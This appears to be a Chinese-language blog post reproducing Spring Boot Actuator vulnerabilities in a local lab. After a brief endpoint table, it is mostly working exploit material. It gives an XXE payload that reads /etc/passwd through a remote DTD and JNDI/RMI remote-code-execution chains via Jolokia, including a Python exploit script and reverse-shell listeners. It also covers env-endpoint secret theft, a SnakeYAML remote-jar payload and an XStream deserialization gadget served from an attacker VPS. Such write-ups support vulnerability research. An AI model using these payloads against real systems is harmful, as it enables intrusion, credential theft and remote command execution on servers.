Spring Boot漏洞复现(spring boot actuator v2漏洞)
文章标签:
bootstrap spring
Spring Boot漏洞复现
复现一下Sprint Boot的一些漏洞
- 环境搭建
Dump环境
Mvn构建项目
启动项目
- 端点信息
路径 描述/autoconfig 提供了一份自动配置报告,记录哪些自动配置条件通过了,哪些没通过/beans 描述应用程序上下文里全部的Bean,以及它们的关系/env 获取全部环境属性/configprops 描述配置属性(包含默认值)如何注入Bean/dump 获取线程活动的快照/health 报告应用程序的健康指标,这些值由HealthIndicator的实现类提供/info 获取应用程序的定制信息,这些信息由info打头的属性提供/mappings 描述全部的URI路径,以及它们和控制器(包含Actuator端点)的映射关系/metrics 报告各种应用程序度量信息,比如内存用量和HTTP请求计数/shutdown 关闭应用程序,要求endpoints.shutdown.enabled设置为true/trace 提供基本的HTTP请求跟踪信息(时间戳、HTTP头等)- Spring Boot 1.x版本端点在根URL下注册
2.x版本端点移动到/actuator/路径
Jolokia漏洞利用
Jolokia漏洞利用(XXE)
- jolokia/list
查看jolokia/list中存在的 Mbeans,是否存在logback 库提供的reloadByURL方法
- 创建logback.xml和fileread.dtd文件
logback.xml
<?xml version="1.0" encoding="utf-8" ?><!DOCTYPE a [ <!ENTITY % remote SYSTEM "http://x.x.x.x/fileread.dtd">%remote;%int;]><a>&trick;</a>fileread.dtd
<!ENTITY % d SYSTEM "file:///etc/passwd"><!ENTITY % int "<!ENTITY trick SYSTEM ':%d;'>">- 将文件上传到公网VPS上并且开启http服务
- 远程访问logback.xml文件
127.0.0.1:8090/jolokia/exec/ch.qos.logback.classic:Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL/http:!/!/x.x.x.x!/logback.xml
- 成功利用xxe读取到etc/passwd文件内容
Jolokia漏洞利用(RCE)
- 下载修改RMI服务代码
- 编译打包
mvn clean install打包成功后创建target目录下生成RMIServer-0.1.0.jar文件
- 修改logback.xml文件内容
<configuration> <insertFromJNDI env-entry-name="rmi://x.x.x.x:1097/jndi" as="appName" /></configuration>- 把RMIServer-0.1.0.jar文件上传到公网vps上并执行
java -Djava.rmi.server.hostname=x.x.x.x -jar RMIServer-0.1.0.jar- nc监听
nc -lvp 6666- 漏洞url上访问
http://127.0.0.1:8090/jolokia/exec/ch.qos.logback.classic:Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL/http:!/!/xxx.xxx.xxx.xxx!/logback.xml- 反弹shell
Jolokia漏洞利用(RCE-createJNDIRealm方法)
查看/jolokia/list 中存在的是否存在org.apache.catalina.mbeans.MBeanFactory类提供的createJNDIRealm方法,可能存在JNDI注入,导致远程代码执行
- python执行脚本
import requests as reqimport sysfrom pprint import pprinturl = sys.argv[1] + "/jolokia/"pprint(url)#创建JNDIRealmcreate_JNDIrealm = { "mbean": "Tomcat:type=MBeanFactory", "type": "EXEC", "operation": "createJNDIRealm", "arguments": ["Tomcat:type=Engine"]}#写入contextFactoryset_contextFactory = { "mbean": "Tomcat:realmPath=/realm0,type=Realm", "type": "WRITE", "attribute": "contextFactory", "value": "com.sun.jndi.rmi.registry.RegistryContextFactory"}#写入connectionURL为自己公网RMI service地址set_connectionURL = { "mbean": "Tomcat:realmPath=/realm0,type=Realm", "type": "WRITE", "attribute": "connectionURL", "value": "rmi://x.x.x.x:1097/jndi"}#停止Realmstop_JNDIrealm = { "mbean": "Tomcat:realmPath=/realm0,type=Realm", "type": "EXEC", "operation": "stop", "arguments": []}#运行Realm,触发JNDI 注入start = { "mbean": "Tomcat:realmPath=/realm0,type=Realm", "type": "EXEC", "operation": "start", "arguments": []}expoloit = [create_JNDIrealm, set_contextFactory, set_connectionURL, stop_JNDIrealm, start]for i in expoloit: rep = req.post(url, json=i) pprint(rep.json())- 运行RMI服务
java -Djava.rmi.server.hostname=x.x.x.x -jar RMIServer-0.1.0.jar- nc 监听
nc -lvp 6666- python发送请求
python exp.py http://127.0.0.1:8090- 反弹shell
env端点利用
SpringBoot env 获取* 敏感信息
如果Spring Cloud Libraries在路径中,则'/env'端点会默认允许修改Spring环境属性。 “@ConfigurationProperties”的所有bean都可以进行修改和重新绑定。
- 例如要获取PID(这是假设,假设PID为**)
- 修改enveureka.client.serviceUrl.defaultZone属性
- nc监听
- refresh
- base64解码获取属性
spring Cloud env yaml利用
当spring boot使用Spring Cloud 相关组件时,会存在spring.cloud.bootstrap.location属性,通过修改 spring.cloud.bootstrap.location 环境变量实现 RCE
- 利用范围
Spring Boot 2.x 无法利用成功 Spring Boot 1.5.x 在使用 Dalston 版本时可利用成功,使用 Edgware 无法成功 Spring Boot <= 1.4 可利用成功
- 下载exp修改执行命令
https://github.com/artsploit/yaml-payload- 将java文件进行编译
javac src/artsploit/AwesomeScriptEngineFactory.javajar -cvf yaml-payload.jar -C src/ .- 创建yaml文件并放到公网
!!javax.script.ScriptEngineManager [ !!java.net.URLClassLoader [[!!java.net.URL ["http://xxx.xxx.xxx.xxx:8000/yaml-payload.jar"] ]]]- 修改 spring.cloud.bootstrap.location为外部 yml 配置文件地址
- 请求 /refresh 接口触发
- 执行命令成功
xstream反序列化
- 前提条件
Eureka-Client <1.8.7(多见于Spring Cloud Netflix)
- 在VPS创建xstream文件,使用flask返回application/xml格式数据
from flask import Flask, Responseapp = Flask(__name__)@app.route('/', defaults={'path': ''})@app.route('/<path:path>', methods = ['GET', 'POST'])def catch_all(path): xml = """<linked-hash-set> <jdk.nashorn.internal.objects.NativeString> <value class="com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data"> <dataHandler> <dataSource class="com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource"> <is class="javax.crypto.CipherInputStream"> <cipher class="javax.crypto.NullCipher"> <serviceIterator class="javax.imageio.spi.FilterIterator"> <iter class="javax.imageio.spi.FilterIterator"> <iter class="java.util.Collections$EmptyIterator"/> <next class="java.lang.ProcessBuilder"> <command> <string>命令</string> </command> <redirectErrorStream>false</redirectErrorStream> </next> </iter> <filter class="javax.imageio.ImageIO$ContainsFilter"> <method> <class>java.lang.ProcessBuilder</class> <name>start</name> <parameter-types/> </method> <name>foo</name> </filter> <next>foo</next> </serviceIterator> <lock/> </cipher> <input class="java.lang.ProcessBuilder$NullInputStream"/> <ibuffer></ibuffer> </is> </dataSource> </dataHandler> </value> </jdk.nashorn.internal.objects.NativeString></linked-hash-set>""" return Response(xml, mimetype='application/xml')- 启动服务
python3 flask_xstream.py- 写入配置
- 刷新触发
- 获取反弹shell
参考
一次曲折的渗透测试之旅
Spring Boot Actuator 漏洞利用
Spring Boot Actuators配置不当导致RCE漏洞复现